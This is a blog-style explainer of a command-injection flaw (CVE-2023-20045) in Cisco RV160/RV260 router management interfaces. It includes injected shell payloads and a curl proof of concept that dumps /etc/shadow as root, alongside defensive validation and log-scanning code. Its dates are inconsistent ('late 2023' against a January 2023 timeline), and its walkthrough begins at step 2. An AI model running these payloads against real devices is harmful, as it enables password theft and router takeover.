In late 2023, a serious vulnerability was disclosed under the identifier CVE-2023-20045. This bug impacts Cisco Small Business RV160 and RV260 Series VPN routers. Cisco devices are widely used in small business offices and remote branches because they’re affordable, reliable, and easy to manage.
But behind that friendly interface, an attacker who already has an admin login can break past the front gate and take total control of the device, right down to the underlying operating system. In this post, we'll explain in simple terms *what the problem is, how it works, how it's being exploited in the wild*, and what you should do if your office uses these routers.
- Attack Vector: Sending a specially crafted request to the web management interface
- Cisco Advisory: Cisco Security Advisory - CVE-2023-20045
What’s the Issue?
The main problem here is *insufficient user input validation* in the router’s web management interface. That means the software doesn’t properly check what an administrator enters into certain web forms or API fields.
If a logged-in admin enters "normal" data, everything is fine. But if someone enters malicious input, such as Linux shell syntax with metacharacters like `;`, they can trick the router into running arbitrary commands as the all-powerful root user.
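To make the difference between "checks the input" and "doesn't check the input" concrete, here is an added example that is not code from the post or from Cisco's firmware. It assumes a hypothetical backend helper named `set_hostname` (mirroring the post's description) and uses the post's payload as a constructed input. The unsafe function only builds the shell string and never executes it; the hardened function allowlists hostname characters first and then builds an argv list for `shell=False`, and `argv_roundtrip` shows why that second layer matters by handing the payload to a child process as a single argument.

```python
import re
import subprocess
import sys

# RFC 1123 hostname label: letters, digits and hyphens, no leading/trailing hyphen.
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")

# Constructed payload, taken from the post's hostname example.
PAYLOAD = "myrouter; cat /etc/passwd > /tmp/leak.txt #"


def build_command_unsafe(name: str) -> str:
    """The vulnerable pattern: the form value is spliced verbatim into a shell
    command line. Returned as a string (never executed) so this is safe to run."""
    return f"set_hostname {name}"  # hypothetical backend helper


def is_valid_hostname(name: str) -> bool:
    """Allowlist check: anything outside [A-Za-z0-9-] (';', '|', '$', '>', spaces,
    backticks) fails, regardless of what a shell would do with it."""
    return HOSTNAME_RE.fullmatch(name) is not None


def validate_hostname(name: str) -> str:
    if not is_valid_hostname(name):
        raise ValueError(f"invalid hostname: {name!r}")
    return name


def build_command_safe(name: str) -> list[str]:
    """Hardened pattern: validate, then build an argv list. With shell=False the
    value is passed as one argument and no shell ever parses it."""
    return ["set_hostname", validate_hostname(name)]


def argv_roundtrip(value: str) -> str:
    """Run a child with shell=False and return exactly what it received as argv[1].
    Python itself is the child so the example runs anywhere; metacharacters in
    `value` arrive literally and are never interpreted."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


if __name__ == "__main__":
    print("unsafe command string :", build_command_unsafe(PAYLOAD))
    print("payload passes allowlist?", is_valid_hostname(PAYLOAD))
    print("safe argv for 'myrouter':", build_command_safe("myrouter"))
    print("child received argv[1] :", repr(argv_roundtrip(PAYLOAD)))
```

The allowlist is the primary control: a hostname field has no legitimate need for `;`, `>` or spaces, so rejecting them outright is simpler and more robust than trying to escape them. The argv layer is defence in depth for the case where a field must carry richer content.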
Step-by-Step: How the Exploit Works
Let’s walk through what actually happens on a vulnerable device.
2. Attacker Crafts a Malicious Request
Using that access, the attacker sends a request to the web-based manager. For example, when a configuration field such as the hostname or syslog server is set, the software takes whatever was entered and splices it into a backend shell command without validating it properly.
Suppose there's a web form for setting the router's device name. The attacker submits:

```
myrouter; cat /etc/passwd > /tmp/leak.txt #
```

Now, instead of just setting the router name to "myrouter", the router's backend system command ends up running:

```
set_hostname myrouter; cat /etc/passwd > /tmp/leak.txt # ...
```

- `myrouter;` ends the legitimate command.
- `cat /etc/passwd > /tmp/leak.txt` is then executed separately, writing out vital OS info.
- `#` turns whatever the original command appended after the value into a shell comment, so it never runs.
Proof-of-Concept (PoC) Code
Let's demonstrate with a basic PoC using curl (a command-line tool for making HTTP requests). Do NOT use on systems you do not own/authorize. This is for awareness.
```bash
# Replace values below
ADMIN_USER=admin          # credentials of an already-compromised admin account
ADMIN_PASS=AdminPassword
ROUTER_IP=192.168.1.1     # management address of the router

# The routername field carries the injected shell command
curl -s -u "$ADMIN_USER:$ADMIN_PASS" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "routername=router; cat /etc/shadow > /tmp/grabbed.txt#" \
  http://$ROUTER_IP/cgi-bin/config.cgi
```
What’s happening?
If the `routername` field isn't properly sanitized, this sends a payload that runs `cat /etc/shadow > /tmp/grabbed.txt` as root. The attacker can later read `/tmp/grabbed.txt` to extract hashed passwords.
Important Note:
The actual vulnerable fields and endpoints may vary by firmware and model. Researchers have found multiple fields that are vulnerable.
- Bypass of VPN security: They can eavesdrop, create malicious VPN tunnels, or inject traffic.
- Persistence: Malicious files/scripts can be added to stay after reboots.
- Pivoting: Attackers can use the trusted network position to attack internal systems.
Cisco has confirmed limited, targeted exploitation of this flaw in the wild. In practice, attackers first steal or guess admin passwords (which are notoriously weak in small business setups), then use this exploit for full takeover.
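Because the vulnerable fields vary by firmware and model (see the note above), a detection that watches for one field name will miss variants. The added example below, which is not from the post and not a Cisco product feature, instead scans every form value in web-management POST requests for shell metacharacters. The log format and the field names `routername` and `syslog_server` are constructed for illustration; the second sample line carries the post's own PoC payload URL-encoded the way a proxy or access log would record it.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample of web-management POST bodies as a reverse proxy or
# access log might record them: timestamp, source IP, method, path, body.
SAMPLE_LOG = """\
2023-01-21T10:02:11Z 10.0.0.5 POST /cgi-bin/config.cgi routername=branch-rv260
2023-01-21T10:05:47Z 10.0.0.5 POST /cgi-bin/config.cgi routername=router%3B+cat+%2Fetc%2Fshadow+%3E+%2Ftmp%2Fgrabbed.txt%23
2023-01-21T10:06:02Z 10.0.0.9 POST /cgi-bin/config.cgi syslog_server=10.0.0.50
2023-01-21T10:07:30Z 10.0.0.5 POST /cgi-bin/config.cgi syslog_server=10.0.0.50%60id%60
"""

# Characters that a hostname, IP address or server field never legitimately
# needs but that a shell treats as command separators, redirects or substitutions.
SHELL_META = re.compile(r"[;|&`$<>\n]")

LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<method>\S+) (?P<path>\S+) (?P<body>.*)$"
)


def suspicious_fields(body: str) -> list[tuple[str, str]]:
    """Decode a form body and return (field, value) pairs whose decoded value
    contains shell metacharacters. Decoding first matters: the attacker sends
    '%3B', not ';', so a check on the raw body would miss it."""
    hits = []
    for field, value in parse_qsl(body, keep_blank_values=True):
        if SHELL_META.search(value):
            hits.append((field, value))
    return hits


def scan_log(text: str) -> list[dict]:
    """Return one alert per suspicious field, with enough context to pivot on."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        for field, value in suspicious_fields(m["body"]):
            alerts.append({
                "ts": m["ts"], "src": m["src"], "path": m["path"],
                "field": field, "value": value,
            })
    return alerts


def sources_with_alerts(alerts: list[dict]) -> dict[str, int]:
    """Count alerts per source address; repeated hits from one admin session
    are the pattern the post describes (stolen credentials, then injection)."""
    counts: dict[str, int] = {}
    for a in alerts:
        counts[a["src"]] = counts.get(a["src"], 0) + 1
    return counts


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f"{a['ts']} {a['src']} {a['path']} {a['field']}={a['value']!r}")
    print("alerts per source:", sources_with_alerts(found))
```

In practice this runs over logs from whatever sits in front of the management interface (a reverse proxy, a firewall with HTTP inspection, or a SIEM ingesting the router's own logs), since the router itself will not flag the request it is about to execute. Two alerts from the same source against different fields is a strong signal that an admin account has been taken over rather than a typo.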
Official References
- Cisco Security Advisory: cisco-sa-sb-rv-command-inject-p9KQ
- NIST NVD - CVE-2023-20045
- Exploit Database details _(note: may require login)_
Apply Cisco’s firmware updates
Cisco has released patches. Download and update your router from the Cisco Support Page.
Conclusion
CVE-2023-20045 reminds us that even “secure” VPN routers can hide dangerous vulnerabilities behind the login screen. Once inside with admin rights, a hacker can break out of every box and take over the device in a matter of seconds. In a small business, this could mean the difference between a safe network and an exposed one.
Stay up-to-date. Patch often. Restrict access. And always—always—use strong, unique admin passwords.
Further Reading
- Cisco Product Security Incident Response Team (PSIRT)
- Hardening Cisco Small Business Routers
Timeline
Published on: 01/20/2023 07:15:00 UTC
Last modified on: 01/30/2023 19:00:00 UTC